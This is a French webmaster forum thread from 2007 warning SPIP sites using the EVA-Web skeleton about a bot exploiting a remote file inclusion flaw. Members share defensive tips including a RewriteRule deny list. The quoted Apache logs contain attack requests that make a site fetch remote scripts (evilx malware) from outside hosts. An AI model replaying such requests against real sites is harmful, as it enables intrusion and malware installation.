-> Attention, problème de sécurité avec spip /EVA

tofm2

WRInaute passionné
Bonjour

Un robot d'origine inconnue scanne actuellement les sites spip qui fonctionnent avec le squelette eva.

Ce robot est précédé d'une requete google ou autre moteur de recherche (mozbot par ex) sur
"et utilise le squelette " qui correspond au footer par défaut des dernières version de Eva web
XX-XX-XX-220.cable.ubr08.azte.blueyonder.co.uk www;monsite.com - [02/Jul/2007:05:34:05 +0200] "GET /favicon.ico HTTP/1.1" 404 291 "http://www.mozbot.fr/search?q=%22et+utilise+le+squelette+EVA-Web%22&st=local" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4"
XX-XX-XX-220.cable.ubr08.azte.blueyonder.co.uk www;monsite.com - [02/Jul/2007:05:36:34 +0200] "GET /spip.php?rubrique3 HTTP/1.1" 200 6006 "http://www.mozbot.fr/search?q=%22et+utilise+le+squelette+EVA-Web%22&st=local" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4"
ça c'est le log apache de la recherche de faille sur mozbot
Quelque temps après, vous verrez fleurir des requetes (jusqu'à 5 fois le traffic normal du site) du type
YYY.YYY.YYY.108 www;monsite.com - [02/Jul/2007:05:53:10 +0200] "GET /spip.php?rubrique3/eva/index.php3?perso=http://ulil.t35.com/2? HTTP/1.1" 200 19641 "-" "libwww-perl/5.65"
YYY.YYY.YYY.108 www;monsite.com - [02/Jul/2007:05:53:10 +0200] "GET /spip.php?rubrique3/eva/index.php3?aide=http://ulil.t35.com/2? HTTP/1.1" 200 19640 "-" "libwww-perl/5.65"
ou encore du genre
bublue.dX www;monsite.com - [02/Jul/2007:16:07:40 +0200] "GET /eva/index.php3?perso=http://www.hardpornclips.com/tgp/evilx? HTTP/1.1" 403 298 "-" "libwww-perl/5.69"
bublue.dX www;monsite.com - [02/Jul/2007:16:12:48 +0200] "GET /eva/index.php3?perso=http://www.hardpornclips.com/tgp/evilx? HTTP/1.1" 403 294 "-" "libwww-perl/5.69"
(enfin celui là j'avais déjà bloqué libwww-perl -> erreur 403;voir plus bas)
évidemment, c'est pas bon, ça semble télécharger ou activer un script de daube qui fait je ne sais pas quoi de bon à distance en se référrant de votre domaine, ça sent clairement le pâté !
J'avais déjà signalé ce problème ici il y a quelques jours
https://www.webrankinfo.com/forum/t/logs-bizarre-libwww-perl-sur-gp60ovh-hier-et-avant-hier.76007/
cela s'était calmé depuis, mais j'ai renoté un regain d'activité aujourd'hui et cela commence à vraiment me faire ch...!
J'ai préfére par mesure de sécurité interdire simplement l'accès du site en question à toute requète de la part de useragent=libwww-perl; en attendant d'en savoir un peu plus. D'un autre côté, cela m'emm..... au plus haut point, et dans ces conditions, je sais être méchant, à bon entendeur salut

J'invite donc les utilisateurs de spip+Eva WEB à la plus grande prudence et à regarder leurs logs d'un peu plus près. Dans le doute, faites en plus disparaitre la mention "et utilise le squelette " du footer
(c'est entre les lignes 42 et 52 du fichier /squelette/inc_pied.html)
Code:
<p>
	<:copyright_spip:>
	<a href="http://www.spip.net/fr">SPIP #SPIP_VERSION</a>
	<:copyright_eva:>
	<a href="http://spip-edu.edres74.net/eva/"><:version_eva:></a>
	</p>
	<p>
	<BOUCLE_maj(RUBRIQUES){age>=0}{par date}{inverse}{0,1}>
   Dernière mise &agrave; jour : <b>[(#DATE|nom_jour)] [(#DATE|affdate)]</b>
	</BOUCLE_maj>
	</p>
tant pis pour le copyright, l'équippe développeurs de spip comprendra qu'il s'agit d'un trou de sécurité.
Bon, j'éspère ne pas en avoir trop oublié, faites passer le message.
 

tofm2

WRInaute passionné
Suite de l'affaire,
le scan télécharge et execute deux malwares, dont evilx
qui d'après ZATAZ modifie les entrées de registre Windows correspondant au firewall, pour pouvoir accéder à une page web et télécharger tous types de fichiers, notamment des malwares. Bref, ça confirme ce que je pensais, c pas bon.
 

passion

WRInaute accro
Je n'ai jamais utilisé ces CMS, je préfère tout à la mano!

Ce n'est pas marrant pour ces utilisateurs SPIP mais je serais heureux de montrer ce topic à mes collègues qui ne jurent que par ces genres de CMS qui vont soi-disant remplacer progressivement toutes les boites du web!

Et mon principal argument a toujours été, c'est bien les open sources mais comme le nom l'indique même login hyper sécurisé ne pourront empêcher les tentatives illicites puisqu'il suffit d'ouvrir les fichiers sources pour en chercher les failles!!

Je sais de quoi je parle puisque j'ai dû modifier des fichiers sources de SPIP afin de le personnaliser pour des clients.

Mais tout le monde ne le fait pas donc risque potentiel !
 

Leonick

WRInaute accro
passion a dit:
Je n'ai jamais utilisé ces CMS, je préfère tout à la mano!
j'ai eu ce type d'essai d'attaque sur un site qui n'utilisait aucun script CMS ou autre, mais un script perso, mais ça ne les empêche ps d'essayer. Ca renvoie évidemment des erreurs 403, (dès que j'ai un http dans l'url).
C'est pareil avec les requêtes contenant tous les noms de répertoires de scripts connus :twisted:
 

jidébé

WRInaute discret
Bonsoir,

Une petite exclusivité en passant, la prochaine version de CrawlTrack (c'est pour septembre) détectera les tentatives de hacking (Cross site scripting et SQL injection).

Une petite démo (en anglais pour l'instant) ici

J'ai sur mon site entre 1000 et 1500 tentatives par jour !!!

Alors il faut vraiment être vigilant. ;)

Jean-Denis
 

rog

WRInaute passionné
@leonick

c'est pas mal mais y a une multitude de façons de passer http dans l'url

rog
 

Leonick

WRInaute accro
rog a dit:
@leonick

c'est pas mal mais y a une multitude de façons de passer http dans l'url

rog
et un
Code:
RewriteRule (_vti_bin|blogs|forum|search|http|shell|scanner|open|command|MSOffice|phpa|rpc|^xml|portal|community|drupal|blog|wordpress|phpgroupware|awstats|cgi-bin|web|chat|mysql|db\/|horde|mail/|/main|/read|cacti) - [NC,F,L]
Ca le fait déjà pas mal, non ?
 

Discussions similaires

Haut